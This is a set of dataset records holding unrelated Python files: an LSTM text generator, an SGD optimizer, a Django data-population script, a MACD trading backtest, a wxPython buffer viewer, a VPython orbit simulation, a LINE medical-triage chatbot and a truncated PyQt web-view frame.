os.makedirs(args.model_path)\n\n # Load vocabulary wrapper\n with open(args.emb_model, 'rb') as f:\n emb_model = pickle.load(f)\n\n emb_model_weights = emb_model.wv.syn0\n\n # Build data loader\n # data_loader = get_loader(args.image_dir, args.caption_path, vocab,\n # args.dictionary, args.batch_size,\n # shuffle=True, num_workers=args.num_workers)\n # data = input(\"Enter Topic: \")\n # Build the models\n #encoder = EncoderCNN(args.embed_size).to(device)\n # dictionary = pd.read_csv(args.dictionary, header=0,encoding = 'unicode_escape',error_bad_lines=False)\n # dictionary = list(dictionary['keys'])\n\n decoder = DecoderRNN(args.embed_size, args.hidden_size, len(emb_model.wv.vocab), args.num_layers, emb_model_weights).to(device)\n decoder.load_state_dict(torch.load(args.model_path, map_location=device))\n decoder.eval()\n\n\n # Train the models\n # total_step = len(data_loader)\n # for epoch in range(args.num_epochs):\n # for i, (array, captions, lengths) in enumerate(data_loader):\n array = torch.zeros((256))\n count = 0\n for val in key_words:\n array = torch.add(array, torch.from_numpy(emb_model.wv[val]))\n count += 1\n array = torch.div(array, count)\n # print(\"In sample\", array)\n array = (array, )\n array = torch.stack(array, 0)\n array = array.to(device)\n # print(\"After\", array)\n #captions = captions.to(device)\n # targets = pack_padded_sequence(captions, lengths, batch_first=True)[0]\n\n # Forward, backward and optimize\n #features = encoder(images)\n outputs = decoder.sample(array)\n\n count = 0\n sentence = ''\n for i in range(len(outputs)):\n sampled_ids = outputs[i].cpu().numpy() # (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n count += 1\n word = emb_model.wv.index2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n sentence = sentence.join(' ')\n sentence = sentence.join(sampled_caption)\n\n # Print out the image and the generated caption\n print (sentence)\n return sentence\n # print(count)\n\ndef Distance(x1,y1,x2,y2):\n\treturn ((x1-x2)**2 + (y1-y2)**2 ) ** 0.5\n\n\ndef generateKeywords(camp,resource_map,X,Y):\n\tcamp[\"distance\"] = 0\n\n\tfor idx,row in cmap.iterrows():\n\t\tcmap.loc[idx,\"distance\"] = Distance(row[\"X\"],row[\"Y\"],X,Y)\n\n\tcmap.sort_values(by=['distance'],inplace = True)\n\tresource_ids = cmap.resource_id.values[0:6]\n\tdes = []\n\tfor i in resource_ids:\n\t\tif(len(resource_map[resource_map.resource_id == i].Summarization.values)!=0):\n\t\t\tdes.append(resource_map[resource_map.resource_id == i].Summarization.values[0])\n\n\tall_keywords, values = unique_keywords(des)\n\tkeys = list(pd.unique(values))\n\tprint(keys)\n\treturn keys\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--computency_map\", type=str, required=True, help=\"Path to the computency map\")\n\tparser.add_argument(\"--resource\", type=str, required=True, help=\"Path to the resource csv\")\n\n\tparser.add_argument(\"--input_X\", type=float, required=True, help=\"X_Cooridnate\")\n\tparser.add_argument(\"--input_Y\", type=float, required=True, help=\"Y_Cooridnate\")\n\tparser.add_argument('--model_path', type=str, default='collections_all_science_out/allcontent_required_NotNull_sum_outFastText.ckpt' , help='path of saved models')\n# \tparser.add_argument('--vocab_path', type=str, default='allcontent_required_NotNull_sum_outCaptions.pkl', help='path for vocabulary wrapper')\n# \tparser.add_argument('--dictionary', type=str, default='allcontent_required_NotNull_sum_out.dict', help='path to dictionary file')\n # parser.add_argument('--caption_path', type=str, default='data/testdata.csv', help='path for train annotation json file')\n\tparser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')\n\tparser.add_argument('--image_dir', type=str, default='png/' , help='tmp')\n\tparser.add_argument('--emb_model', type=str, default='collections_all_science_out/fasttext.model', help='path for embedding model')\n\n # Model parameters\n\tparser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors')\n\tparser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states')\n\tparser.add_argument('--num_layers', type=int , default=2, help='number of layers in lstm')\n\n\tparser.add_argument('--num_epochs', type=int, default=5)\n\tparser.add_argument('--batch_size', type=int, default=128)\n\tparser.add_argument('--num_workers', type=int, default=2)\n\tparser.add_argument('--learning_rate', type=float, default=0.001)\n\n\n\targs = parser.parse_args()\n\n\tcmap = pd.read_csv(args.computency_map)\n\tresource_map = pd.read_csv(args.resource)\n\n\tcmap.sort_values(by = ['topic_volume', 'doc_volume'],inplace = True)\n\n\tnear_topics = generateKeywords(cmap,resource_map,args.input_X,args.input_Y)\n\n\tsen = genereate(args,near_topics)\n","sub_path":"gen_new_sumFastText.py","file_name":"gen_new_sumFastText.py","file_ext":"py","file_size_in_byte":11458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136311786","text":"import numpy as np\nfrom copy import deepcopy\n\nclass SGD:\n\n\tdef __init__(self, lr, momentum):\n\t\tself.lr = lr\n\t\tself.momentum = momentum\n\t\tself.prev_deltas = None\n\n\tdef step(self, layers):\n\t\tif not self.prev_deltas:\n\t\t\tself.prev_deltas = [np.zeros_like(layer.weights) for layer in layers]\n\n\t\tfor layer, prev_deltas in zip(layers, self.prev_deltas):\n\t\t\tfor j, in_node in enumerate(layer.in_nodes):\n\t\t\t\tfor k, out_node in enumerate(layer.out_nodes):\n\t\t\t\t\tdelta = self.lr*in_node*out_node\n\t\t\t\t\tlayer.weights[k, j] += delta + self.momentum*prev_deltas[k, j]\n","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160897198","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','first_project.settings')\n\nimport django\ndjango.setup()\n\n\nimport random\nfrom first_app.models import Topic,AccessRecord,Webpage\nfrom faker import Faker\n\nfakegen = Faker()\ntopic = ['Movies','Games','Electronics & Media','Cartoons','Footwear']\n\ndef add_topic():\n t = Topic.objects.get_or_create(top_name=random.choice(topic))[0]\n t.save()\n return t\n\n\ndef populate(N=5):\n\n for entry in range(N):\n\n top = add_topic()\n\n\n fake_name = fakegen.company()\n fake_url = fakegen.url()\n fake_date = fakegen.date()\n\n\n webpg = Webpage.objects.get_or_create(topic=top,name=fake_name,url=fake_url)[0]\n\n acc_rec = AccessRecord.objects.get_or_create(name=webpg,date=fake_date)[0]\n\n\nif __name__ == '__main__':\n print(\"populating script\")\n populate(10)\n print(\"populating complete/done\")\n","sub_path":"Django Level Two/first_project/populate_first_app.py","file_name":"populate_first_app.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"91746180","text":"import pandas as pd\r\nfrom matplotlib.pyplot import *\r\nimport numpy as np\r\n\r\nN = 1000\r\nname = \"korona.csv\"\r\n\r\n\r\nclass trade:\r\n __name = \"\"\r\n __money = 0\r\n\r\n def __init__(self, name, money):\r\n self.__name = name\r\n self.__money = money\r\n self.trading()\r\n\r\n def trading(self):\r\n bought = 0\r\n\r\n transactions = 0\r\n starting_money = self.__money\r\n macd = Macd(self.__name)\r\n exchange = data(self.__name)\r\n exchange, days = exchange.getData()\r\n signal = macd.getBuySell()\r\n print(exchange)\r\n print(signal)\r\n for i in range(1, len(signal)):\r\n if signal[i] == int(1) and bought == 0:\r\n bought = (self.__money) / exchange[i] # count how many actions are bought\r\n self.__money = self.__money - (self.__money)\r\n transactions = transactions + 1\r\n print(\"bought for: \" + str(exchange[i]))\r\n elif signal[i] == int(-1) and bought > 0:\r\n self.__money = self.__money + (bought * exchange[i]) # sell previously bought actions\r\n transactions = transactions + 1\r\n print(\"sold for: \" + str(exchange[i]))\r\n bought = 0\r\n\r\n print(\"To sold: \" + str(bought) + \" now for: \" + str(exchange[len(signal)]) + \" equals: \" + str(\r\n bought * exchange[len(signal)]))\r\n print(\"After trading for 1000 days and completing \" + str(transactions) + \" transactions from: \" + str(\r\n starting_money) + \" PLN, we have: \" + str(self.__money) + \" PLN.\")\r\n\r\n\r\nclass data:\r\n __name = \"\"\r\n\r\n def __init__(self, name):\r\n self.__name = name\r\n\r\n def getData(self):\r\n data = pd.read_csv(self.__name) # load csv file\r\n close_data = []\r\n days_reversed = []\r\n for i in range(0, N):\r\n close_data.append(float(data.iloc[i, 2])) # 2 miałem\r\n days_reversed.append(data.iloc[i, 1])\r\n\r\n days = []\r\n data_reversed = []\r\n for i in reversed(close_data):\r\n data_reversed.append(i)\r\n for i in reversed(days_reversed):\r\n days.append(i)\r\n return data_reversed, days\r\n\r\n\r\nclass Macd:\r\n __macd = []\r\n __signal = []\r\n __date = []\r\n __buy_and__sell_signals = []\r\n\r\n def __init__(self, name):\r\n numbers = data(name)\r\n numbers, days = numbers.getData()\r\n self.macd(numbers)\r\n self.signal()\r\n self.buySell()\r\n self.__date = days\r\n\r\n def eman(self, n, data, day):\r\n alpha = float(2 / (n + 1))\r\n p_reversed = data[day - n: day:]\r\n p_base = []\r\n\r\n for i in reversed(p_reversed):\r\n p_base.append(i)\r\n\r\n counter = float(0.0)\r\n denominator = float(0.0)\r\n\r\n for i in range(n):\r\n number = pow(float((1 - alpha)), i)\r\n counter += p_base[i] * number\r\n denominator += number\r\n\r\n return counter / denominator\r\n\r\n def signal(self):\r\n self.__signal = []\r\n\r\n for i in range(1, len(self.__macd)):\r\n if i < 9:\r\n ema9 = self.eman(i, self.__macd, i)\r\n self.__signal.append(0)\r\n else:\r\n ema9 = self.eman(9, self.__macd, i)\r\n self.__signal.append(ema9)\r\n\r\n def macd(self, exchange):\r\n self.__macd = []\r\n for i in range(1, len(exchange)):\r\n if i <= 12:\r\n ema12 = self.eman(i, exchange, i)\r\n ema26 = self.eman(i, exchange, i)\r\n self.__macd.append(ema12 - ema26)\r\n elif i < 26:\r\n ema12 = self.eman(12, exchange, i)\r\n ema26 = self.eman(i, exchange, i)\r\n self.__macd.append(ema12 - ema26)\r\n else:\r\n ema12 = self.eman(12, exchange, i)\r\n ema26 = self.eman(26, exchange, i)\r\n self.__macd.append(ema12 - ema26)\r\n\r\n def buySell(self):\r\n self.__buy_and__sell_signals.clear()\r\n self.__buy_and__sell_signals.append(int(0))\r\n minus = 0\r\n plus = 0\r\n for var in range(1, len(self.__macd) - 1):\r\n if self.__macd[var - 1] > self.__signal[var - 1] and self.__macd[var] <= self.__signal[var] and self.__macd[var] > 0:\r\n minus = minus + 1\r\n self.__buy_and__sell_signals.append(int(-1))\r\n elif self.__macd[var - 1] < self.__signal[var - 1] and self.__macd[var] >= self.__signal[var] and self.__macd[var] < 0:\r\n plus = plus + 1\r\n self.__buy_and__sell_signals.append(int(1))\r\n else:\r\n self.__buy_and__sell_signals.append(int(0))\r\n print(plus)\r\n print(minus)\r\n\r\n def getMacd(self):\r\n return self.__macd\r\n\r\n def getSignal(self):\r\n return self.__signal\r\n\r\n def getDate(self):\r\n return self.__date\r\n\r\n def getBuySell(self):\r\n return self.__buy_and__sell_signals\r\n\r\n\r\nclass Plot:\r\n def __init__(self, name):\r\n self.create_macd_plot(name)\r\n self.create_data_plot(name)\r\n self.create_macd_and_dara_plot(name)\r\n\r\n def create_macd_plot(self, name):\r\n numbers = Macd(name)\r\n titleName = ''\r\n for i in name:\r\n if i == '.':\r\n break\r\n else:\r\n titleName += i\r\n\r\n titleName += \" MACD Pointer\"\r\n p1, = plot(numbers.getMacd(), label=\"macd\") # macd blue\r\n p2, = plot(numbers.getSignal(), label=\"signal\")\r\n l1 = legend([p1], [\"macd\"], loc=1)\r\n l2 = legend([p2], [\"signal\"], loc=2)\r\n grid(True)\r\n days = numbers.getDate()\r\n xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n ylabel('Values')\r\n xticks(np.arange(0, N + 1, step=N / 5), (\r\n days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n days[int(N - 1)]))\r\n title(titleName)\r\n gca().add_artist(l1)\r\n show()\r\n\r\n def create_data_plot(self, name):\r\n numbers = data(name)\r\n titleName = \"\"\r\n for i in name:\r\n if i == '.':\r\n break\r\n else:\r\n titleName += i\r\n titleName += \" exchange\"\r\n numbers, days = numbers.getData()\r\n plot(numbers)\r\n grid(True)\r\n xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n ylabel('Cost in PLN')\r\n xticks(np.arange(0, N + 1, step=N / 5), (\r\n days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n days[int(N - 1)]))\r\n title(titleName)\r\n show()\r\n\r\n def create_macd_and_dara_plot(self, name):\r\n numbers = Macd(name)\r\n imputData = data(name)\r\n imputData, days = imputData.getData()\r\n titleName = ''\r\n for i in name:\r\n if i == '.':\r\n break\r\n else:\r\n titleName += i\r\n\r\n p1, = plot(numbers.getMacd(), label=\"macd\") # macd blue\r\n p2, = plot(imputData, label=\"input data\")\r\n l1 = legend([p1], [\"macd\"], loc=1)\r\n l2 = legend([p2], [\"input data\"], loc=2)\r\n grid(True)\r\n xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n ylabel('Values')\r\n xticks(np.arange(0, N + 1, step=N / 5), (\r\n days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n days[int(N - 1)]))\r\n title(titleName)\r\n gca().add_artist(l1)\r\n show()\r\n\r\n\r\ndef main():\r\n # b = Plot(name)\r\n c = trade(name, 1000)\r\n\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269283610","text":"import wx\r\n\r\nfrom Kernel import Module\r\nfrom icons import icons8_comments_50\r\n\r\n_ = wx.GetTranslation\r\n\r\n\r\nclass BufferView(wx.Frame, Module):\r\n def __init__(self, parent, *args, **kwds):\r\n # begin wxGlade: BufferView.__init__\r\n wx.Frame.__init__(self, parent, -1, \"\",\r\n style=wx.DEFAULT_FRAME_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.TAB_TRAVERSAL)\r\n Module.__init__(self)\r\n self.SetSize((697, 584))\r\n self.text_buffer_length = wx.TextCtrl(self, wx.ID_ANY, \"\")\r\n self.text_buffer_info = wx.TextCtrl(self, wx.ID_ANY, \"\", style=wx.TE_CHARWRAP | wx.TE_MULTILINE)\r\n\r\n # Menu Bar\r\n self.BufferView_menubar = wx.MenuBar()\r\n wxglade_tmp_menu = wx.Menu()\r\n item = wxglade_tmp_menu.Append(wx.ID_ANY, \"Export EGV\", \"Export Engrave Data\")\r\n self.Bind(wx.EVT_MENU, self.on_menu_export, id=item.GetId())\r\n item = wxglade_tmp_menu.Append(wx.ID_ANY, \"Import EGV\", \"Import Engrave Data\")\r\n self.Bind(wx.EVT_MENU, self.on_menu_import, id=item.GetId())\r\n self.BufferView_menubar.Append(wxglade_tmp_menu, \"File\")\r\n self.SetMenuBar(self.BufferView_menubar)\r\n # Menu Bar end\r\n\r\n self.__set_properties()\r\n self.__do_layout()\r\n # end wxGlade\r\n self.Bind(wx.EVT_CLOSE, self.on_close, self)\r\n\r\n def on_close(self, event):\r\n if self.state == 5:\r\n event.Veto()\r\n return\r\n else:\r\n self.state = 5\r\n self.device.close('window', self.name)\r\n event.Skip() # Call destroy as regular.\r\n\r\n def initialize(self, channel=None):\r\n self.device.close('window', self.name)\r\n self.Show()\r\n\r\n pipe = self.device.interpreter.pipe\r\n buffer = None\r\n if pipe is not None:\r\n try:\r\n buffer = pipe._buffer + pipe._queue\r\n except AttributeError:\r\n buffer = None\r\n if buffer is None:\r\n buffer = _(\"Could not find buffer.\\n\")\r\n\r\n try:\r\n buffer_str = buffer.decode()\r\n except ValueError:\r\n buffer_str = buffer.decode(\"ascii\")\r\n except AttributeError:\r\n buffer_str = buffer\r\n\r\n self.text_buffer_length = self.text_buffer_length.SetValue(str(len(buffer_str)))\r\n self.text_buffer_info = self.text_buffer_info.SetValue(buffer_str)\r\n\r\n def finalize(self, channel=None):\r\n try:\r\n self.Close()\r\n except RuntimeError:\r\n pass\r\n\r\n def shutdown(self, channel=None):\r\n try:\r\n self.Close()\r\n except RuntimeError:\r\n pass\r\n\r\n def __set_properties(self):\r\n _icon = wx.NullIcon\r\n _icon.CopyFromBitmap(icons8_comments_50.GetBitmap())\r\n self.SetIcon(_icon)\r\n # begin wxGlade: BufferView.__set_properties\r\n self.SetTitle(_(\"BufferView\"))\r\n self.text_buffer_length.SetMinSize((165, 23))\r\n # end wxGlade\r\n\r\n def __do_layout(self):\r\n # begin wxGlade: BufferView.__do_layout\r\n sizer_1 = wx.BoxSizer(wx.VERTICAL)\r\n sizer_5 = wx.BoxSizer(wx.HORIZONTAL)\r\n label_8 = wx.StaticText(self, wx.ID_ANY, _(\"Buffer\"))\r\n sizer_5.Add(label_8, 0, 0, 0)\r\n sizer_5.Add(self.text_buffer_length, 10, 0, 0)\r\n sizer_1.Add(sizer_5, 0, wx.EXPAND, 0)\r\n sizer_1.Add(self.text_buffer_info, 1, wx.EXPAND, 0)\r\n self.SetSizer(sizer_1)\r\n self.Layout()\r\n # end wxGlade\r\n\r\n# end of class BufferView\r\n\r\n def on_menu_export(self, event): # wxGlade: BufferView.\r\n self.device.execute(\"egv export\")\r\n\r\n def on_menu_import(self, event): # wxGlade: BufferView.\r\n self.device.execute(\"egv import\")\r\n\r\n","sub_path":"BufferView.py","file_name":"BufferView.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437086136","text":"from copy import copy\nfrom time import sleep\n\nimport numpy as np\nfrom p02_simulator import AstroObject, Simulator\n\n\nfrom vpython import *\n\n\n#################################################################################\n# Main program\n#################################################################################\n\n# set up parameters\nG = 6.67*10**(-11) # Newton's gravitational constant in m**3 kg**(-1) s**(-2)\nM = 1.99*10**30 # mass of the Sun in kg\nm = 5.97*10**24 # mass of the Earth in kg\nRmin = 147.1*10**9 # perihelion distance (initial point) in m\n\n# express everything in natural units - use years for time\nm0=5.97*10**24 # express all masses in terms of Earth's mass\nR0=149.6*10**8 # 1/10 AU (experiment with this)\nt0=24*3600*365.24\n\nG=G/(R0**3) *m0 * t0**2 # G in R0^3 m_E**(-1) years**(-2) \nM = M/m0\nm = m/m0\nRmin = Rmin/R0\n\n\n# set up the VPython scene\nscene = canvas(title='Solar System',\n width=600, height=400,\n center=vector(0,0,0), background=color.black)\n\n# For some reason, the creators thought it would be a good idea to have y be the\n# upward direction. We'll change that to the z direction.\nscene.forward = vector(1,0,0)\nscene.up = vector(0,0,1)\n\n# Define and initiate the simulated objects - remember to translate to natural units!\nsun = AstroObject(G, \n mass = 1.99*10**30/m0, \n pos=vector(0,0,0),\n velocity=vector(0,0,0), \n color=color.orange, radius=1)\n\nearth = AstroObject(G, \n mass = 5.97*10**24/m0, \n pos=vector(147.1*10**9/R0,0,0), \n velocity=vector(0,29800*t0/R0,0), \n color=color.blue, radius=0.2)\n\n# Create the list of objects and initiate the simulator.\nobjects=[sun, earth]\nsim = Simulator(objects, G, 0.001)\n\n\n# Choose the time span of the simulation (in years).\ntmax = 2\n\n\n# Create a VPython graph object for the potential energy.\nvgraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Potential Energy', \\\n xtitle = 't [yr]', ytitle = 'V [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\n# All subsequently defined VPython curve objects are children of the\n# same graph until the next graph object is created.\nvcurves=[ ]\nfor obj in objects:\n\tvcurves.append(gcurve(color=obj.color))\n\n# Same graph for the kinetic energy...\ntgraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Kinetic Energy (radial + angular)', \\\n xtitle = 't [yr]', ytitle = 'T [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\ntcurves=[ ]\nfor obj in objects:\n\ttcurves.append(gcurve(color=obj.color))\n\n\n# ... and the total energy.\negraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Total Energy', \\\n xtitle = 't [yr]', ytitle = 'E [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\necurves=[ ]\nfor obj in objects:\n\tecurves.append(gcurve(color=obj.color))\n\n# We add one curve that contains the total energy of the entire system.\necurves.append(gcurve(color=vector(31,158,137)/255.))\n\n\n# Initialize step counter...\nsteps = 0\n\n# ... and start the simulation.\nwhile steps * sim.dt < tmax:\n\n\t# VPython animation rate.\n\trate(100)\n\t\n\t# Take a time step.\n\tsim.update_euler()\n\n\t# Update energy graphs.\n\ttotE = 0\n\tfor i, obj in enumerate(objects):\n\t\t# if obj == earth:\n\t\ttcurves[i].plot(steps*sim.dt, obj.T)\n\t\tvcurves[i].plot(steps*sim.dt, obj.V)\n\t\tecurves[i].plot(steps*sim.dt, obj.V + obj.T)\n\t\ttotE += obj.T + 0.5*obj.V\n\n\tecurves[-1].plot(steps*sim.dt, totE)\n \n\tsteps+=1\n\n\n","sub_path":"Projects/p02/p02_solar_system.py","file_name":"p02_solar_system.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65610352","text":"# -*- coding: utf-8 -*-\nimport os\nfrom config import *\nif os.getenv(\"DEV\") is not None:\n from dotenv import load_dotenv\n \n load_dotenv(dotenv_path='./.env')\n\nimport sys\nimport json\nimport time\nfrom hospital import *\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import *\n\napp = Flask(__name__)\n\n# getting channel secret\n# This would be the preferred approach but it just doesn't work\n# CHANNEL_SECRET = os.getenv('LINE_CHANNEL_SECRET')\n# CHANNEL_TOKEN = os.getenv('LINE_CHANNEL_TOKEN')\n\nif CHANNEL_SECRET is None:\n print(\"LINE_CHANNEL_SECRET may be undefined.\")\n sys.exit(1)\nif CHANNEL_TOKEN is None:\n print(\"LINE_CHANNEL_TOKEN may be undefined\")\n sys.exit(1)\n\nline_bot_api = LineBotApi(CHANNEL_TOKEN)\nhandler = WebhookHandler(CHANNEL_SECRET)\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n\n return 'OK'\n\n\nSTATE = {}\nDEPARTMENT = {}\n# state: 0(init), 1(diagnosis), 2(hospital), 3(covid-19), 4(knowledge), 5(knowledge_disease)\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n global STATE\n user = event.source.user_id\n if user not in STATE:\n STATE[user] = 0\n message = event.message.text\n if message == \"back\":\n STATE[user] = 0\n ret_message = TextSendMessage(text=\"請問要提供您什麼服務呢\")\n elif message == \"初步診斷\" and STATE[user] == 0:\n msg = \"請簡述您的症狀\"\n STATE[user] = 1\n ret_message = TextSendMessage(text=msg)\n\n elif STATE[user] == 1 and (\"胸悶\" in message) and (\"疲累\" in message):\n msg = \"初步分析結果:\\n心臟、肺臟、其他\\n\\n建議掛科:\\n心臟科、胸腔內科\\n\\n可能病因:\\n感染\\n\\n建議:\\n若為心臟方面疾病,需盡快就醫檢查\"\n STATE[user] = 0\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(\n items=[\n QuickReplyButton(\n action=MessageAction(label=\"相關疾病查詢\", text=\"相關疾病查詢\")\n ),\n QuickReplyButton(\n action=MessageAction(label=\"查詢附近的內科醫院\", text=\"查詢附近的內科醫院\")\n ),\n QuickReplyButton(\n action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n )\n ]))\n elif STATE[user] == 1 and (\"呼吸困難\" in message) or (\"嘨喘\" in message):\n STATE[user] = 0\n msg = \"初步分析結果:\\n氣管阻塞、氣喘、慢性阻塞性肺病(COPD)、肺栓塞\\n近期covid19疫情嚴重,若仍有發燒、咳嗽等症狀同時出現,可能為新冠肺炎之感染!\\n\\n建議掛科:\\n胸腔科、感染科\\nCOVID-19患者請前往急診篩檢\\n\\n可能病因:\\n肺部感染、心衰竭\"\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(\n items=[\n QuickReplyButton(\n action=URIAction(label='Covid19篩檢站', uri='https://antiflu.cdc.gov.tw/ExaminationCounter')\n )\n ]))\n elif STATE[user] == 1:\n msg = \"Kompanion 暫時還診斷不出來您的病因,請尋找專業醫生協助,保重身體喔!!\"\n ret_message = TextSendMessage(text=msg)\n STATE[user] = 0\n\n elif STATE[user] == 0 and message == \"醫療小知識\":\n STATE[user] = 4\n time.sleep(2)\n msg = \"請問要詢問那一科呢?\"\n qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in DEPARTMENTS]\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(items=qr)\n )\n \n elif STATE[user] == 4:\n STATE[user] = 5\n msg = f\"請問想了解{message}的什麼疾病呢?\"\n if message == \"心臟科\":\n qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in [\"心肌炎\",\"高血壓心臟病\",\"風濕性心臟病\",\"缺血性心臟病\",\"瓣膜性心臟病\",\"感染性心內膜炎\",\"心包膜疾病\",\"心律不整\",\"心臟腫瘤\",\"冠心病\",\"主動脈瘤破裂\",\"心肌梗塞\"]]\n ret_message = TextSendMessage(text=msg,quick_reply=QuickReply(items=qr))\n elif message == \"胸腔內科\":\n qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in [\"肺炎\",\"肺栓塞\",\"心因性肺水腫\",\"氣胸\",\"氣喘\",\"肺癌\",\"慢性阻塞性肺病(COPD)\",\"慢性支氣管炎\",\"急性支氣管炎\",\"支氣管擴張症\",\"支氣管癌\"]]\n ret_message = TextSendMessage(text=msg,quick_reply=QuickReply(items=qr))\n else:\n ret_message = TextSendMessage(text=msg)\n time.sleep(2)\n\n elif STATE[user] == 5 and message == \"心肌炎\":\n STATE[user] = 0\n msg = \"提供以下資訊給您參考:\\nhttps://wwwv.tsgh.ndmctsgh.edu.tw/unit/10012/12856\"\n ret_message = TextSendMessage(text=msg)\n\n elif STATE[user] == 5:\n STATE[user] = 0\n\n msg = \"提供以下資訊給您參考:\\nhttps://wwwv.tsgh.ndmctsgh.edu.tw/unit/10012/12856\"\n ret_message = TextSendMessage(text=msg)\n\n elif STATE[user] == 0 and message == \"查詢附近的採檢站\":\n STATE[user] = 3\n msg = \"請提供您的位置\"\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(\n items=[\n QuickReplyButton( \n action=LocationAction(label=\"查詢附近的採檢站\")\n ),\n QuickReplyButton(\n action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n )\n ]))\n\n elif STATE[user] == 0 and message == \"查詢附近的醫院\":\n STATE[user] = 2\n time.sleep(2)\n qr = [QuickReplyButton(action=MessageAction(label=department, text=department)) for department in DEPARTMENTS]\n \n ret_message = TextSendMessage(\n text=\"要看哪一科呢?\",\n quick_reply=QuickReply(items=qr))\n\n elif STATE[user] == 2 or message == \"查詢附近的內科醫院\":\n msg = \"請提供您的位置\"\n DEPARTMENT[user] = message\n ret_message = TextSendMessage(\n text=msg,\n quick_reply=QuickReply(\n items=[\n QuickReplyButton( \n action=LocationAction(label=\"查詢附近的醫院\")\n ),\n QuickReplyButton(\n action=MessageAction(label=\"其他服務\", text=\"其他服務\")\n )\n ]))\n\n else:\n STATE[user] = 0\n ret_message = TextSendMessage(text='你好!!我是 Kompanion,您的智慧醫療小助手!請問我能夠幫您什麼呢?')\n\n line_bot_api.reply_message(event.reply_token, ret_message)\n\n@handler.add(MessageEvent, message=LocationMessage)\ndef handle_location_message(event):\n\n global STATE\n global DEPARTMENT\n user = event.source.user_id\n LATITUDE = event.message.latitude\n LONGITUDE = event.message.longitude\n if STATE[user] == 3:\n pcr_name = get_nearby_PCR((LATITUDE, LONGITUDE))\n msg = f\"離您最近的採檢站為:\\n{pcr_name}\\n\\n打開google map以查詢位置:\\nhttps://www.google.com.tw/maps/search/{pcr_name}\"\n ret_message = TextSendMessage(text=msg)\n elif STATE[user] == 2:\n # get_hospital_by_department DEPARTMENT[user]\n test_flex = json.load(open(\"./flex/hospital.json\", \"r\"))\n ret_message = FlexSendMessage(alt_text='hospital', contents=test_flex)\n else:\n ret_message = TextSendMessage(text=str(STATE[user]))\n \n STATE[user] = 0\n line_bot_api.reply_message(event.reply_token, ret_message)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244137461","text":"import sys\nimport os\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtCore import QUrl\n\nclass TabletFrame(QMainWindow):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title = 'Figaro Tablet Control'\n\t\tself.setWindowTitle(self.title)\n\t\tself.setGeometry(200,200,800,600)\n\t\thtml_view = HTMLVis(self)\n\t\tself.show()\n\nclass HTMLVis(QWebEngineView):\n\n\tdef __init__(self, parent):\n\t\tsuper().__init__(parent)\n\t\tself.cwd = 